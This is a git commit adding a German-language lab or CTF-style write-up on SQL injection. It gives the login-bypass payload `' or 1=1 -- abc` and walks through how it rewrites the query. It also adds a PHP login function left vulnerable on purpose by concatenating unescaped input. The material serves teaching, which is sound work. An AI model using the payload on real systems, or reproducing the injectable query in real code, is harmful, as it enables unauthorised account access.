Add SQL Injection write up
This commit is contained in:
commit
10255f134e
GPG key ID:
8CB7375654585956
3 changed files with 67 additions and 0 deletions
44
sql-injection/README.md
Normal file
44
sql-injection/README.md
Normal file
|
|
@ -0,0 +1,44 @@
|
|||
# SQL Injection
|
||||
|
||||
Gegeben ist eine Login-Form.
|
||||
Ziel ist es, sich als Nutzer `max` anzumelden.
|
||||
Sein Passwort kennen wir nicht.
|
||||
|
||||
|
||||
|
||||
## Lösung
|
||||
|
||||
Wir geben folgenden Daten ein:
|
||||
|
||||
- **Benuzername**: `max`
|
||||
- **Passwort**: `' or 1=1 -- abc`
|
||||
|
||||
Auf dem Server wird das dann etwa so ausgeführt:
|
||||
```php
|
||||
<?php
|
||||
function checkLogin() {
|
||||
$user = $_POST['user']; // ESCAPE FEHLT!!!!
|
||||
$password = $_POST['password']; // ESCAPE FEHLT!!!!
|
||||
|
||||
$query = "SELECT * FROM users"
|
||||
. " WHERE user = '$user'"
|
||||
. " AND password='$password'"; // Siehe Hint
|
||||
return doesQueryReturnAnyRow($query);
|
||||
}
|
||||
|
||||
if (checkLogin()) {
|
||||
echo "Information: Task solved!";
|
||||
}
|
||||
```
|
||||
Mit unsere Eingabe kann man sich die Evaluierung
|
||||
des `WHERE`-Teils der Anfrage in der Datenbank
|
||||
in etwa so Vorstellen:
|
||||
```sql
|
||||
WHERE user = '$user' AND password='$password'
|
||||
<=> WHERE user = 'max' AND password='' or 1=1 -- abc'
|
||||
<=> WHERE user = 'max' AND 1=1 -- abc'
|
||||
<=> WHERE user = 'max' -- abc'
|
||||
<=> WHERE user = 'max'
|
||||
```
|
||||
Also Login wir mit `max` ein,
|
||||
ohne sein Passwort zu kennen.
|
||||
23
sql-injection/dummy-login-code.php
Normal file
23
sql-injection/dummy-login-code.php
Normal file
|
|
@ -0,0 +1,23 @@
|
|||
<?php
|
||||
$_POST = array(
|
||||
'user'=>'abc',
|
||||
'password'=>'def');
|
||||
|
||||
function doesQueryReturnAnyRow($query) {
|
||||
var_dump($query);
|
||||
return true;
|
||||
}
|
||||
|
||||
function checkLogin() {
|
||||
$user = $_POST['user']; // ESCAPE FEHLT!!!!
|
||||
$password = $_POST['password']; // ESCAPE FEHLT!!!!
|
||||
|
||||
$query = "SELECT * FROM users"
|
||||
. " WHERE user = '$user'"
|
||||
. " AND password='$password'"; // Siehe Hint
|
||||
return doesQueryReturnAnyRow($query);
|
||||
}
|
||||
|
||||
if (checkLogin()) {
|
||||
echo "Information: Task solved!";
|
||||
}
|
||||
BIN
sql-injection/sql-injection.png
Normal file
BIN
sql-injection/sql-injection.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 14 KiB |
Reference in a new issue